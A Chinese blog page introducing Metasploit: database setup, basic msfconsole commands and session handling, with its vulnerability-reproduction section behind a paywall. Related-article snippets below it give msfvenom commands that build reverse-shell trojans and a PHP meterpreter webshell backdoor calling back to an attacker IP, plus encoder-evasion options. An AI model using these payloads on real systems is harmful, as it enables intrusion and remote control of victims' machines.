Metasploit基本使用及常见漏洞复现

最新推荐文章于 2024-08-03 19:06:23 发布
最新推荐文章于 2024-08-03 19:06:23 发布
阅读量1.5k 收藏 5
点赞数
分类专栏: 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BeatRex/article/details/89299948
版权

一、数据库配置

  1. 启动postgresql数据库服务:/etc/init.d/postgresql start
    在这里插入图片描述
  2. su - postgres
  3. 创建数据库用户:createuser 用户名 -P然后输入密码
    在这里插入图片描述
  4. 创建数据库:createdb --owner=用户名 数据库名
  5. 启动msf:msfconsole
  6. msf连接数据库:db_connect 用户名:密码@127.0.0.1/数据库名
  7. 查看数据库连接状态:db_status

二、常用命令

  1. 查看帮助信息help

  2. 搜索:search 关键字
    如搜索ipidseq进行ip扫描
    在这里插入图片描述

  3. 选择模块:use 模块
    如使用搜索到的模块:
    在这里插入图片描述

  4. 查看受影响的范围:show targets

  5. 查看需要设置的选项:show options
    在这里插入图片描述
    Required中为yes的需要我们手动设置,如果current setting即当我们不去设置需要我们手动设置的选项时他的默认参数。

  6. 设置选项:set 选项 值 全局设置:setg 选项 值
    在这里插入图片描述
    取消某个选项的参数:unset 选项名 全局取消:unsetg 选项名

  7. 开始扫描:run或者exploit

  8. 查看session列表:session -l

  9. 进入到具体的session:session -i 编号

  10. 挂起session:background

三、常见漏洞进行复现

<

最低0.47元/天 解锁文章
BeatRex
关注
专栏目录
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
07-14 532
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
[系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
12-28 9627
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。
复现实验 Metasploit应用 漏洞渗透测试
m0_74634242的博客
12-28 882
msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP lport=kali的端口号 -f exe -o /var/payload.exe (生成文件的地址)-p, --payload 指定要生成的payload( 攻击荷载)。-f, --format 指定输出格式(可以使用 --help-formats 来获取msf支持的输出格式列表)–help-formats 查看msf支持的输出格式列表。-o, --out 指定存储payload的位置。
MSFsessions命令使用
qq_44624916的博客
11-28 5595
MSF使用
三十种未授权访问漏洞复现 合集( 一 )
最新发布
qq_48368964的博客
08-03 1340
开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。造成未授权访问的根本原因就在于启动 Mongodb 的时候未设置 –auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。
msf 获取一个普通的session 控制windows
weixin_44286136的博客
05-19 2703
msf 获取session 在kali终端中打开msfconsole控制台 开启监听 use exploit/multi/handler 设置tcp监听 set payload windows/meterpreter/reverse_tcp 再次开启一个终端进行(shift+ctrl+T),查看本机ip 利用msfvenom制作木马程序 说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell -e 编码方式 -i 编码次数 -b 在生成的程序
msf学习笔记
qq_48257021的博客
12-20 1118
SMB(服务器消息快):TCP445、NBT间接用TCP139接收数据,MS10-012、MS10-054 MSRPC(微软远程过程调用):TCP139、445,MS05-039、MS09-026、-e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload。-t exe -x /root/正常.exe -o 1213.exe -e x86/shikata_ga_nai -k -c 20。
初探 Metasploit 漏洞框架
GitChat
04-12 3277
Metasploit 就是一个漏洞框架。它的全称叫做 The Metasploit Framework,简称叫做 MSFMetasploit 作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。 几乎任何公开通用漏洞都会被添加到 Metasploit 的武器库里,所以用好 Metasploit 是渗透致胜的关键。 本场 Cha...
使用Metasploit查找漏洞
cuyi7076的博客
06-26 4581
在部署诸如操作系统,应用程序或Web服务器之类的软件时,最大的担忧之一就是安全性。 该应用程序安全吗,还是您不知道有漏洞漏洞? 大多数有兴趣知道此问题答案的管理员都只是依靠供应商网站上发布的各种安全公告来获取所需的信息。 但是,如果您是想深入了解其应用程序的众多管理员和安全专家之一,则可以主动验证您的软件是否确实受到威胁的影响。 在安全领域,设计了几种工具来进行所谓的漏洞测试 ,每种工具...
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
Metasploit实战:利用漏洞进行远程渗透
首先,我们将介绍漏洞扫描工具的基本概念和常见工具的特点。之后,我们将探讨漏洞分析与利用的方法和技巧,以及如何利用Metasploit进行漏洞利用的实际操作。让我们一起深入了解漏洞扫描与利用的知识吧。 ### 第三章...
Metasploit(一)--Meterpreter的命令速查表
weixin_34167819的博客
08-27 870
原文:http://www.2cto.com/Article/201311/259669.html第1步:核心命令? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist – 提供所有正在运行的后台脚本的列表bgrun – 作为一个后台线程运行脚本channel – 显示活动频道close – 关闭...
MSF建立webshell后门,并监听端口建立session连接
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R &gt; test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
metasploit之基础命令操作
Longwaer
01-29 2995
学习了解MSF的各种命令小技巧,熟练掌握后渗透技术。
meterpreter会话渗透利用常用的32个命令归纳小结
qq_34450601的博客
05-05 1万+
仅作渗透测试技术实验之用,请勿针对任何未授权网络和设备。https://www.cnblogs.com/ssooking/p/6192995.htmlrun vnc 无法操作的远程桌面1、background命令返回,把meterpreter后台挂起2、session命令session 命令可以查看已经成功获取的会话可以使用session -i 连接到指定序号的meterpreter会话已继续利用...
内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)
热门推荐
网络安全领域___专研者.
03-22 1万+
Msfconsole工具概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见漏洞利用模块和生成各种木马,方便于安全测试人员的使用. (1)进行端口扫描. (2)进行服务的扫描.(3)扫描3306(Mysql)端口的弱口令.(4)在msf模块里也可以使用nmap进行扫描.(5)扫描了服务器是用Win XP,然后对服务器进行渗透测试.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值